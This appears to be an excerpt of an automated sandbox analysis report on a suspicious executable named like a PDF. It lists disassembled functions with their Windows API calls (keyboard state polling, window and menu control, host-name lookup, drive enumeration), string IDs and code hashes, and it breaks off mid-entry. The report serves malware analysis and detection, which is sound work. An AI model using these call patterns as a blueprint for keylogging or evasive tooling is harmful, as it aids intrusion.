                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2279737902-1007645807
                                                            • Opcode ID: afff4074e8d202849f845fb749e392a218452dc09134796b09fabbe864adf50b
                                                            • Instruction ID: 32b5e66eb991fab3978798c7b83b2e426e7be3591344c1c99fd1addc9cf9759f
                                                            • Opcode Fuzzy Hash: afff4074e8d202849f845fb749e392a218452dc09134796b09fabbe864adf50b
                                                            • Instruction Fuzzy Hash: 9C11B23096016DB9DB20B661CC5ADFF7B7CFF96B00F800469B915A60D2EFA00D09C5A3
                                                            Function 001548F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 208665112-3771769585
                                                            • Opcode ID: b58bea76e0f2e74b6eabef1f920ad57a6b4bb5f61f4d146c8b30c2d2c7621d8c
                                                            • Instruction ID: 48af497cda7d402268e02cd5befd5032b22cae6486588c432a1f13e4884d72ef
                                                            • Opcode Fuzzy Hash: b58bea76e0f2e74b6eabef1f920ad57a6b4bb5f61f4d146c8b30c2d2c7621d8c
                                                            • Instruction Fuzzy Hash: 8711E732904115EBCB28EB24DC06EDB77BCEF15719F040179F9599A051EF709AC6C792
                                                            Function 00155217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • timeGetTime.WINMM ref: 0015521C
                                                              • Part of subcall function 00110719: timeGetTime.WINMM(?,7694B400,00100FF9), ref: 0011071D
                                                            • Sleep.KERNEL32(0000000A), ref: 00155248
                                                            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0015526C
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0015528E
                                                            • SetActiveWindow.USER32 ref: 001552AD
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001552BB
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 001552DA
                                                            • Sleep.KERNEL32(000000FA), ref: 001552E5
                                                            • IsWindow.USER32 ref: 001552F1
                                                            • EndDialog.USER32(00000000), ref: 00155302
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1194449130-3405671355
                                                            • Opcode ID: 067e4b1efcd27a28bfbca9ce37043b4b8248ad3b8bedc26a03841bbab3d56818
                                                            • Instruction ID: e0957bcca40d9c581cdfb03a32100a9421dcb9bebb702e2c7490da14201ecd7e
                                                            • Opcode Fuzzy Hash: 067e4b1efcd27a28bfbca9ce37043b4b8248ad3b8bedc26a03841bbab3d56818
                                                            • Instruction Fuzzy Hash: 0121A170204704EFE7115B30EC98A2A3B7AFB94387F040528F8198ADB1CB61ADD9CB21
                                                            Function 0015D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • CoInitialize.OLE32(00000000), ref: 0015D855
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0015D8E8
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 0015D8FC
                                                            • CoCreateInstance.OLE32(00182D7C,00000000,00000001,001AA89C,?), ref: 0015D948
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0015D9B7
                                                            • CoTaskMemFree.OLE32(?,?), ref: 0015DA0F
                                                            • _memset.LIBCMT ref: 0015DA4C
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0015DA88
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0015DAAB
                                                            • CoTaskMemFree.OLE32(00000000), ref: 0015DAB2
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0015DAE9
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 0015DAEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            • API String ID: 1246142700-0
                                                            • Opcode ID: 055f08da0cc2907375ba9671ef89bb2f67f19a74203eb7661690cf3ac69112aa
                                                            • Instruction ID: 3542a3a9f76e47f8192e3b3c7485f82b6b0dfadcd3bb7c6bdc6e8871c46435aa
                                                            • Opcode Fuzzy Hash: 055f08da0cc2907375ba9671ef89bb2f67f19a74203eb7661690cf3ac69112aa
                                                            • Instruction Fuzzy Hash: 0CB10C75A00108EFDB14DFA4D884EAEBBB9FF48305B148469F919EB261DB30ED45CB51
                                                            Function 0015052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 001505A7
                                                            • SetKeyboardState.USER32(?), ref: 00150612
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00150632
                                                            • GetKeyState.USER32(000000A0), ref: 00150649
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00150678
                                                            • GetKeyState.USER32(000000A1), ref: 00150689
                                                            • GetAsyncKeyState.USER32(00000011), ref: 001506B5
                                                            • GetKeyState.USER32(00000011), ref: 001506C3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 001506EC
                                                            • GetKeyState.USER32(00000012), ref: 001506FA
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00150723
                                                            • GetKeyState.USER32(0000005B), ref: 00150731
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: c5152d8483c63bd8086988d92d1105704226f22e750bc989f4605f3c5c3e152d
                                                            • Instruction ID: 227edc4bf339c9baf59926601831fe0c1973edb8b19aa0a420dbdd8a11fa7892
                                                            • Opcode Fuzzy Hash: c5152d8483c63bd8086988d92d1105704226f22e750bc989f4605f3c5c3e152d
                                                            • Instruction Fuzzy Hash: 66510B60A04784A9FB36DBF088547EABFB49F19381F08459DCDD25E1C2EB649B8CCB51
                                                            Function 0014C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 0014C746
                                                            • GetWindowRect.USER32(00000000,?), ref: 0014C758
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0014C7B6
                                                            • GetDlgItem.USER32(?,00000002), ref: 0014C7C1
                                                            • GetWindowRect.USER32(00000000,?), ref: 0014C7D3
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0014C827
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0014C835
                                                            • GetWindowRect.USER32(00000000,?), ref: 0014C846
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0014C889
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0014C897
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0014C8B4
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0014C8C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: dfa06f37e8dedc10d141a511f187eadcb2c996b103d062383b072b3ff4d24776
                                                            • Instruction ID: db34bef8760ce15af9c0f802d00805b1a0fa50182b5908f68403610e24053a49
                                                            • Opcode Fuzzy Hash: dfa06f37e8dedc10d141a511f187eadcb2c996b103d062383b072b3ff4d24776
                                                            • Instruction Fuzzy Hash: 96513F71B00205AFDB18CFA9DD89AAEBBBAFB88711F14812DF519D72A0D7709D418B50
                                                            Function 000F201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000F2036,?,00000000,?,?,?,?,000F16CB,00000000,?), ref: 000F1B9A
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000F20D3
                                                            • KillTimer.USER32(-00000001,?,?,?,?,000F16CB,00000000,?,?,000F1AE2,?,?), ref: 000F216E
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0012BEF6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000F16CB,00000000,?,?,000F1AE2,?,?), ref: 0012BF27
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000F16CB,00000000,?,?,000F1AE2,?,?), ref: 0012BF3E
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000F16CB,00000000,?,?,000F1AE2,?,?), ref: 0012BF5A
                                                            • DeleteObject.GDI32(00000000), ref: 0012BF6C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: 499b9018600bbd10abf12db523ef470efcb0123fd9d3a1044977cee088465f3c
                                                            • Instruction ID: fe14ae2b8d822acb82009fb40cece6c51043909c22d8968fb2721f16e6304346
                                                            • Opcode Fuzzy Hash: 499b9018600bbd10abf12db523ef470efcb0123fd9d3a1044977cee088465f3c
                                                            • Instruction Fuzzy Hash: 61616832104714DFCB359F15DA89B3AB7F2FB64312F108528E64686E61CB79A8D1EF40
                                                            Function 000F21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F25DB: GetWindowLongW.USER32(?,000000EB), ref: 000F25EC
                                                            • GetSysColor.USER32(0000000F), ref: 000F21D3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: e04c4e6cf9d03785b696ce9ba536a49153cbc2e354bd48d37de194d7ec902b84
                                                            • Instruction ID: 2ae62a8a786216d69ae42f83c93c2bc147a90c6c216f715d487d870caefce651
                                                            • Opcode Fuzzy Hash: e04c4e6cf9d03785b696ce9ba536a49153cbc2e354bd48d37de194d7ec902b84
                                                            • Instruction Fuzzy Hash: 4C41B431104154EFDB615F28EC88BB93BA5EB06331F584265FF658A5E2C7318C92EB61
                                                            Function 0015AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,0017F910), ref: 0015AB76
                                                            • GetDriveTypeW.KERNEL32(00000061,001AA620,00000061), ref: 0015AC40
                                                            • _wcscpy.LIBCMT ref: 0015AC6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2820617543-1000479233
                                                            • Opcode ID: 3617b955791711b05b3b04ea9a6687615487b151129f09401fcc10cbb44aee4e
                                                            • Instruction ID: f678e61a357060b1ac6246c3f3f694f062055f15a9bb3d2315989d9494c931af
                                                            • Opcode Fuzzy Hash: 3617b955791711b05b3b04ea9a6687615487b151129f09401fcc10cbb44aee4e
                                                            • Instruction Fuzzy Hash: 2A51EE30588305DFC714EF14C881AAEB7A5FF94311F90492DF9A65B6A2DB31DD4ACA83
                                                            Function 000F9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __i64tow__itow__swprintf
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 421087845-2263619337
                                                            • Opcode ID: 651e0a1b61ee60a78667d6b1eb4f0dce62d9600d9b4a9b3efb99e695182e65c0
                                                            • Instruction ID: 6bbd8d64dbf5936077db0850693884f8b12367f869b9306fb996b42c001520e6
                                                            • Opcode Fuzzy Hash: 651e0a1b61ee60a78667d6b1eb4f0dce62d9600d9b4a9b3efb99e695182e65c0
                                                            • Instruction Fuzzy Hash: 5E41C471504219ABDB28EF38E842F7A73F4AB48304F24447EF649D6291EB719982DB11
                                                            Function 001773C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 001773D9
                                                            • CreateMenu.USER32 ref: 001773F4
                                                            • SetMenu.USER32(?,00000000), ref: 00177403
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00177490
                                                            • IsMenu.USER32(?), ref: 001774A6
                                                            • CreatePopupMenu.USER32 ref: 001774B0
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001774DD
                                                            • DrawMenuBar.USER32 ref: 001774E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                            • String ID: 0$F
                                                            • API String ID: 176399719-3044882817
                                                            • Opcode ID: 1f32a2ede202272161f0a2d2abf0de71d3c411c68998fedb7cdb347129d7b1c1
                                                            • Instruction ID: 0a8740bfb195968140d1bf6cff92a254e831fb6e1c82a05982889053e2aa4f66
                                                            • Opcode Fuzzy Hash: 1f32a2ede202272161f0a2d2abf0de71d3c411c68998fedb7cdb347129d7b1c1
                                                            • Instruction Fuzzy Hash: E9414975A04209EFDB10DF64D888E9ABBF5FF49310F144029F95A973A0D731A950CF50
                                                            Function 0017772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 001777CD
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 001777D4
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 001777E7
                                                            • SelectObject.GDI32(00000000,00000000), ref: 001777EF
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 001777FA
                                                            • DeleteDC.GDI32(00000000), ref: 00177803
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0017780D
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00177821
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0017782D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: static
                                                            • API String ID: 2559357485-2160076837
                                                            • Opcode ID: 4f031cf41d26eff1b6894136be96e112aeea10bcc235acabbe78163d549f7ea0
                                                            • Instruction ID: 36d54e7998fac81d29a23fcf711ab1e5d2f6a46fd84c35972327dd929989102e
                                                            • Opcode Fuzzy Hash: 4f031cf41d26eff1b6894136be96e112aeea10bcc235acabbe78163d549f7ea0
                                                            • Instruction Fuzzy Hash: DC315A31105215ABDB159FA4DC09FDB3B79FF0D321F114228FA19A61E0C7319892DBA4
                                                            Function 00117040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0011707B
                                                              • Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68
                                                            • __gmtime64_s.LIBCMT ref: 00117114
                                                            • __gmtime64_s.LIBCMT ref: 0011714A
                                                            • __gmtime64_s.LIBCMT ref: 00117167
                                                            • __allrem.LIBCMT ref: 001171BD
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001171D9
                                                            • __allrem.LIBCMT ref: 001171F0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0011720E
                                                            • __allrem.LIBCMT ref: 00117225
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00117243
                                                            • __invoke_watson.LIBCMT ref: 001172B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                            • Instruction ID: a78846058ed66f5dddb1fbc31b447e55e48021b8cee290ce0e8e53d778d925d0
                                                            • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                            • Instruction Fuzzy Hash: 1E71F871A04716ABD718AE79DC41BEAB3B8AF25320F14423AF814D73C1E770D9918B90
                                                            Function 00152A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00152A31
                                                            • GetMenuItemInfoW.USER32(001B6890,000000FF,00000000,00000030), ref: 00152A92
                                                            • SetMenuItemInfoW.USER32(001B6890,00000004,00000000,00000030), ref: 00152AC8
                                                            • Sleep.KERNEL32(000001F4), ref: 00152ADA
                                                            • GetMenuItemCount.USER32(?), ref: 00152B1E
                                                            • GetMenuItemID.USER32(?,00000000), ref: 00152B3A
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00152B64
                                                            • GetMenuItemID.USER32(?,?), ref: 00152BA9
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00152BEF
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00152C03
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00152C24
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: 1f6a43f4e6a83699fa757a829c748a977206e38f7102faba845410c3d4da0846
                                                            • Instruction ID: 02d9d91262610d052cbeb0f6fd34525f97d494bb7423ded58c9afdb73acbd554
                                                            • Opcode Fuzzy Hash: 1f6a43f4e6a83699fa757a829c748a977206e38f7102faba845410c3d4da0846
                                                            • Instruction Fuzzy Hash: 3C6190B2900249EFDB11CF64D888EAE7BB8EB12306F140559FC619B251D731AD8ADB21
                                                            Function 00177192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00177214
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00177217
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0017723B
                                                            • _memset.LIBCMT ref: 0017724C
